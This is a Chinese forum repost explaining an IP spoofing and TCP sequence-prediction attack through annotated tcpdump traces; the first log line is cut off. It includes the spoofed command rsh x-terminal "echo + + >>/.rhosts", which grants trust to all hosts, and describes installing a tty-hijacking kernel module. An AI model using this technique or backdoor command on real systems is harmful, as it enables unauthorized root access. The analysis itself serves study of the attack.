设为首页收藏本站
切换到窄版

WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
返回列表 发新帖
  • 1805查看
  • 0回复

[转贴] 利用ip序列攻击

linwenwa

主题

好友

2768

积分

金牌会员
发表于 2009-7-14 12:01:31 |显示全部楼层
361684 apollo.it.luc.edu.990 > x-terminal.shell: R 1382727001:1382727001(0) win 0  
14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell: S 1382727001:1382727001(0) win 4096  
14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989: S 2023232000:2023232000(0) ack 1382727002 win 4096  
14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell: R 1382727002:1382727002(0) win 0  
14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell: S 1382727002:1382727002(0) win 4096  
14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988: S 2023360000:2023360000(0) ack 1382727003 win 4096  
14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell: R 1382727003:1382727003(0) win 0  
14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell: S 1382727003:1382727003(0) win 4096  
14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987: S 2023488000:2023488000(0) ack 1382727004 win 4096  
14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell: R 1382727004:1382727004(0) win 0  
14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell: S 1382727004:1382727004(0) win 4096  
14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986: S 2023616000:2023616000(0) ack 1382727005 win 4096  
14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell: R 1382727005:1382727005(0) win 0  
14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell: S 1382727005:1382727005(0) win 4096  
14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985: S 2023744000:2023744000(0) ack 1382727006 win 4096  
14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell: R 1382727006:1382727006(0) win 0  
14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell: S 1382727006:1382727006(0) win 4096  
14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984: S 2023872000:2023872000(0) ack 1382727007 win 4096  
14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell: R 1382727007:1382727007(0) win 0  
14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell: S 1382727007:1382727007(0) win 4096  
14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983: S 2024000000:2024000000(0) ack 1382727008 win 4096  
14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell: R 1382727008:1382727008(0) win 0  
14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell: S 1382727008:1382727008(0) win 4096  
14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982: S 2024128000:2024128000(0) ack 1382727009 win 4096  
14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell: R 1382727009:1382727009(0) win 0  
14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S 1382727009:1382727009(0) win 4096  
14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096  
14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R 1382727010:1382727010(0) win 0  

  注意每个x-terminal送出的 SYN-ACK 数据包通过 x-terminal 有个初始数列,并且都比前  
一个来的大.  

  我们看到一个伪造的 SYN (连接请求), 是从 server.login 送到 x-terminal.shell 的。  
设想服务器如果被x-terminal所信任, 那么 x-terminal 就可以利用了(甚至一些伪装的服务器)  
请求了.  

  x-terminal 会对服务器回复一个 SYN-ACK, 只有 ACK 过的才可以打开连接.服务器会丢失  
送到 server.login 的数据包,所以ACK 也要伪造.  

  通常情况下, SYN-ACK 的数列需要用来生成有效的 ACK. 虽然这样,攻击者可以预知序列  
包含在 SYN-ACK 中,基于已知的x-terminal的 tcp 序列生成规律,下面还可以 用 ACK 来对付  
那些没有看见的 SYN-ACK :  

14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096  
14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096  

  现在被 spoofing 的机器现在只有一种方法连接到x-terminal.shell服务器就是 server.login.  
它可以维护连接 connection 和 send 请求可以通过完全ACK 掉。应该像下面这样:  

14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096  
14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096  
14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096  

相当于:  

14:18:37 server# rsh x-terminal "echo + + >>/.rhosts"  

从第一个 spoofed 的数据包共用了: < 16 秒的时间  

欺骗的;连接已经被终止了:  

14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096  
14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096  
14:18:43.165874 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096  
14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096  
14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0) win 4096  


我们现在看到 RST 释放了在 server.login 上的队列中的那些半连接和空连接:  

14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096  
14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0) win 4096  
14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0) win 4096  
14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0) win 4096  
14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0) win 4096  
14:18:52.600899 130.92.6.97.605 > server.login: R 1382726965:1382726965(0) win 4096  
14:18:52.660231 130.92.6.97.606 > server.login: R 1382726966:1382726966(0) win 4096  
14:18:52.717495 130.92.6.97.607 > server.login: R 1382726967:1382726967(0) win 4096  
14:18:52.776502 130.92.6.97.608 > server.login: R 1382726968:1382726968(0) win 4096  
14:18:52.836536 130.92.6.97.609 > server.login: R 1382726969:1382726969(0) win 4096  
14:18:52.937317 130.92.6.97.610 > server.login: R 1382726970:1382726970(0) win 4096  
14:18:52.996777 130.92.6.97.611 > server.login: R 1382726971:1382726971(0) win 4096  
14:18:53.056758 130.92.6.97.612 > server.login: R 1382726972:1382726972(0) win 4096  
14:18:53.116850 130.92.6.97.613 > server.login: R 1382726973:1382726973(0) win 4096  
14:18:53.177515 130.92.6.97.614 > server.login: R 1382726974:1382726974(0) win 4096  
14:18:53.238496 130.92.6.97.615 > server.login: R 1382726975:1382726975(0) win 4096  
14:18:53.297163 130.92.6.97.616 > server.login: R 1382726976:1382726976(0) win 4096  
14:18:53.365988 130.92.6.97.617 > server.login: R 1382726977:1382726977(0) win 4096  
14:18:53.437287 130.92.6.97.618 > server.login: R 1382726978:1382726978(0) win 4096  
14:18:53.496789 130.92.6.97.619 > server.login: R 1382726979:1382726979(0) win 4096  
14:18:53.556753 130.92.6.97.620 > server.login: R 1382726980:1382726980(0) win 4096  
14:18:53.616954 130.92.6.97.621 > server.login: R 1382726981:1382726981(0) win 4096  
14:18:53.676828 130.92.6.97.622 > server.login: R 1382726982:1382726982(0) win 4096  
14:18:53.736734 130.92.6.97.623 > server.login: R 1382726983:1382726983(0) win 4096  
14:18:53.796732 130.92.6.97.624 > server.login: R 1382726984:1382726984(0) win 4096  
14:18:53.867543 130.92.6.97.625 > server.login: R 1382726985:1382726985(0) win 4096  
14:18:53.917466 130.92.6.97.626 > server.login: R 1382726986:1382726986(0) win 4096  
14:18:53.976769 130.92.6.97.627 > server.login: R 1382726987:1382726987(0) win 4096  
14:18:54.039039 130.92.6.97.628 > server.login: R 1382726988:1382726988(0) win 4096  
14:18:54.097093 130.92.6.97.629 > server.login: R 1382726989:1382726989(0) win 4096  

server.login 又可以接受连接请求了.  

通过IP地址spoofing 成果获得root权限后,一个叫做"tap-2.01"的内核模块被x-terminal  
编译和安装:  

x-terminal% modstat  
Id Type Loadaddr Size B-major C-major Sysnum Mod Name  
1 Pdrv ff050000 1000 59. tap/tap-2.01 alpha  

x-terminal% ls -l /dev/tap  
crwxrwxrwx 1 root 37, 59 Dec 25 14:40 /dev/tap  

这是一个出现 内核 STREAMS 模块 ,可以防到已有的 STREAMS 堆栈和控制 tty device 上  
面的用户.
回复

使用道具 举报

返回列表 发新帖

快速发帖

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-14 09:35 , Processed in 0.063520 second(s), 16 queries .

返回顶部